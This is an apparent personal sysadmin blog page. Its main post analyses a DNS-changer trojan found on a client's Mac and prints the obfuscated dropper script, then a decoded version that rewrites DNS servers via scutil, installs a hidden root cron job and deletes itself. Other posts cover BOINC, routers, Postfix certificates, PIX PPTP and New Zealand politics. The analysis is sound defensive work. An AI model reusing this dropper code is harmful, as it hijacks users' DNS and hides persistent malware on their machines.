Just today I was telling someone viruses (virii?) weren't an issue on the Mac. OSX is pretty secure I told him but you should have AV software to stop you passing on nasties to your windows friends and colleagues.
Eat my words I did. That afternoon a phone call from another client. He had a problem with no Internet access on his wireless network but others on the network were OK. First test try a site by IP. Fine, so it's a DNS issue..
Yes..but so much more. They had a pretty basic router so monitoring was not an option. OK talk him through opening the terminal and pinging some sites. Takes a while then fails to look it up. OK lets check /etc/resolv.conf...
nameserver 85.255.114.30
nameserver 85.255.112.152
nameserver 192.168.2.5
Oh crap... two of these were not in the TCP settings. I'll let you work out which two...
Further checking...
nick@host ~ $ host 85.255.114.30
;; connection timed out; no servers could be reached
nick@host ~ $ host 85.255.112.152
Host 152.112.255.85.in-addr.arpa not found: 2(SERVFAIL)
nick@host ~ $ whois 85.255.114.30
% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '85.255.112.0 - 85.255.127.255'
inetnum: 85.255.112.0 - 85.255.127.255
netname: UkrTeleGroup
descr: UkrTeleGroup Ltd.
admin-c: UA481-RIPE
tech-c: UA481-RIPE
country: UA
org: ORG-UL25-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: UKRTELE-MNT
mnt-routes: UKRTELE-MNT
mnt-domains: UKRTELE-MNT
source: RIPE # Filtered
Oh crap more... Checked the Startup Items and launchctl but everything looked normal. No processes stood out. How else could it launch? Ah...
Bad-Person-Computer:~ user$ sudo crontab -l
* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1
Smooth... and this file looks like...
more /Library/Internet\ Plug-Ins/QuickTime.xpt
#!/bin/sh
x=`cat "$0" wc -lawk '{print $1}'`;x=`expr $x - 2`;tail -$x "$0" tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv>1;s1=cx.zxx.aas.wq;s2=cx.zxx.aaz.axz;sh 1 `echo $s1tr qazwsxedcr 0123456789` `echo $s2 tr qazwsxedcr 0123456789`;exit;
#!/bpf/oy
daxy="/Lpbjajc/Ifxkjfkx Pivt-Ifo"
PSID=$( (/voj/obpf/olvxpi tjkd PjphajcSkjsplk okq -k 'o/.*PjphajcSkjsplk : //')<< EOF
ndkf
tkx Sxaxk:/Nkxwnjg/Ginbai/IPs4
q.oynw
uvpx
EOF
)
/voj/obpf/olvxpi << EOF
ndkf
q.pfpx
q.aqq SkjskjAqqjkooko * $1 $2
okx Sxaxk:/Nkxwnjg/Skjsplk/$PSID/DNS
uvpx
EOF
kepox=`ljnfxab -itjkd QvplgTphk.edx`
pr [ "$kepox" == "" ]; xykf
klyn "* * * * * \"$daxy/QvplgTphk.edx\">/qks/fvii 2>&1" > ljnf.pfox
ljnfxab ljnf.pfox
jh -jr ljnf.pfox
rp
jh -jr "$0"
It even hides itself so you can't just grep the name server addresses. Roughly translated it gives...
s1=85.255.114.30;s2=85.255.112.152;
#!/bin/sh
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil grep PrimaryService sed -e 's/.*PrimaryService : //')<< EOF
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)/usr/sbin/scutil << EOF
open
d.init
d.add ServerAddresses * $1 $2
set State:/Network/Service/$PSID/DNS
quit
EOF
exist=`crontab -lgrep QuickTime.xpt`
if [ "$exist" == "" ]; then
echo "* * * * * \"$path/QuickTime.xpt\">/dev/null 2>&1" > cron.inst
crontab cron.inst
rm -rf cron.inst
fi
rm -rf "$0"
Simple but I guess there were nasties just waiting to be got from some websites this machine was redirected to. Very Mac specific so not a Linux trojan gone astray. I guess he fell for one of the download this codec type trojans and got this little parasite.
So although we don't have virii in the Mac world little wank stains are out there targeting the Mac using social engineering. I guess you could exploit one of the safari or firefox holes are even spoof someones bank given the recent certificate bypass expoloit..
So I guess the times of relying on security through obscurity are over. I'm not sure if this guy has a name but it made my day a lot more interesting!
Thursday, 15 January 2009
Friday, 9 January 2009
World Community Grid BOINC not uploading
This one was a bit weird. I run BOINC on one machine and all of a sudden WCG stopped uploading with things like..
[World Community Grid] Scheduler request failed: Peer certificate cannot be authenticated with known CA certificates
or another generic one about SSL error.
Turns out playing with some flags (Gentoo build controls options) I had changed curl from using OpenSSL to GnuTLS. No biggie you would have thought but it just does not work for WCG.
Recompile it using OpenSSL makes it all happy again. So if you see these errors see if your curl has openSSL listed after it when you start the boinc_client.
This is all for Linux of course :-)
[World Community Grid] Scheduler request failed: Peer certificate cannot be authenticated with known CA certificates
or another generic one about SSL error.
Turns out playing with some flags (Gentoo build controls options) I had changed curl from using OpenSSL to GnuTLS. No biggie you would have thought but it just does not work for WCG.
Recompile it using OpenSSL makes it all happy again. So if you see these errors see if your curl has openSSL listed after it when you start the boinc_client.
This is all for Linux of course :-)
Thursday, 8 January 2009
Oh yeah..Thomson routers
What were you people thinking? Talk about counter or un intuitive...
The best solution I found to get these things configured for a DSL connection was to save the config to a text file and modify it and upload it.
I webbed into the Thomson router and tried to add a PPP connection. Nope you don't permission to do that as the admin user. WTF?
So download the config after resetting to factory and and add entries with username and password etc for the ppp connection and upload it and it works. So how come I can't enter the username and password in the web interface? Grrr
Don't forget to add a default route to go out the PPP interface and it's easy...
Just a weird web interface.
Bring it Cisco
Well..New Zealand is small. I mean small small...
Cisco have new integrated service routers (88X and 86X to expand on the 87X and 85X range I guess) that do anti virus, etc etc designed for the small office SOH market by US/World standards. That sums up about 90% of our clients.
Bring the new toys on here! I can't wait to try new toys from Cisco that are the all in one type thing. They supposedly block viruses, bad content, malware etc so release it first here and we'll test it.
It would be good to have Snort integration to block bot traffic plus any other nasties. So let's hope the Cisco open source relationship can get to that stage....
So one device that plugs into the phone line and the LAN and is a firewall and does level 3 checks on content for virus, bot etc traffic. Doing the firewall from the outside thing is easy but monitoring outbound traffic for telltale signatures or problems would be great.
Saturday, 15 November 2008
New Zealand Election 2008
Well it's over and we look to be the better for it.
Gone are the socialist (bordering on communist) Labour people. Helen "I don't really have a family but I'll tell you how to run yours" Clark and more importantly Michael "I'm so smug and you depend on me for everything and I know it" Cullen. Their arrogance, social engineering, policies of excess and demotivation hopefully will be replaced by something more positive. They both resigned on the night and good riddance to them. People keep saying how wonderful Helen was. I say crap. She was a professional politician. You need to do more before entering parliament. You need some real world behind you.
So we have centre government still but one that may do some good. ACT from the right and Maori somewhat from the left seem to share a few views. Stop beneficiary dependency seems to be a big one. For different reasons both sides want this fixed. Labour managed to make the middle class in NZ beneficiaries with their working for families program. Let me explain how this works: you pay tax and then you request some back depending on how many children you have and the bureaucracy takes a cut. How about not encouraging people to have too many children and giving a tax cut instead? Easy to work out, easier to manage and better for the environment... I have little time for green propaganda and the simplest way to keep the planet under control is to have less demands on it.
If both sides want to work on the benefit dependancy trap then we should get some progress. Here about three quarters of crime is associated with beneficiaries. Simplistic I know but even cut that in half the police can get on to the real work. There's another huge failing of the PC. Anyone can become a policeperson (sic) so you have lots of arrogant young people with a uniform. Great. Bring back the tough entry conditions. Bring back the respected policeman that nipped petty crime before it got to more. Ahh nostalgia. Anyway get people motivated, get them doing something with their lives and contributing and busy.
One last point: ACT don't turn into the thing your campaigned against. Rodney Hide has already pissed off a lot of people playing the power trip card. Pull your head in and get on with it. Winston Hide is a bad label.
Monday, 22 September 2008
OSX server (Postfix) and certificates...
Well, we got a certificate from Thawte for this site and it worked fine for https and imaps but kept failing for smtps.
The log kept saying can't read the .crt file in /etc/certificates/.
Not a permissions problem. So I tried converting the file to pem etc but still no joy.
In the end the problem was the .key file which is des encrypted. So to get OSX server to work with smtps (and possible other postfix installs) you need to leave the key exposed and remove the passkey and encryption.
openssl rsa -infile file.key -outfile outfile.key
will remove the des encryption but you need to make the permissions tight, tight, tight on that file.
Hope this saves someone some time...
Monday, 8 September 2008
PIX PPTP problems
I've run into a few problems with PPTP on PIX over the years.
I got one sorted today so figured I'd share the love.
We switched from a direct ethernet connection to being behind DSL router and NATing everything.
For some reason PPTP stopped and gave the error...
GRE request discarded from my.ip.add.ress to outside:x.x.x.x
The TCP 1723 part was fine but the GRE was now broken. After some debugging and testing it seems the change from direct to NATted we need the
fixup protocol pptp 1723
command. Once this was in it all worked fine again.
I got one sorted today so figured I'd share the love.
We switched from a direct ethernet connection to being behind DSL router and NATing everything.
For some reason PPTP stopped and gave the error...
GRE request discarded from my.ip.add.ress to outside:x.x.x.x
The TCP 1723 part was fine but the GRE was now broken. After some debugging and testing it seems the change from direct to NATted we need the
fixup protocol pptp 1723
command. Once this was in it all worked fine again.
Subscribe to:
Posts (Atom)
Librewolf shows “some of LibreWolf’s security features may offer less protection on your current operating system”
I'm test driving Ubuntu after using Gentoo for years and found Librewolf gave me this warning banner. “some of LibreWolf’s security feat...
-
We still see this one occasionally. Had one case where we needed to get a policy on but couldn't reboot the firewall. So, tried a few ...
-
I couldn't find a simple guide for this so here it is... I have Ubuntu 12.04 with btrfs as my main FS. Once Windows was install Ubunt...
-
This is something that caught my interest a few years ago and has been sitting in the garage churning out tiny fractions of a bitcoin regula...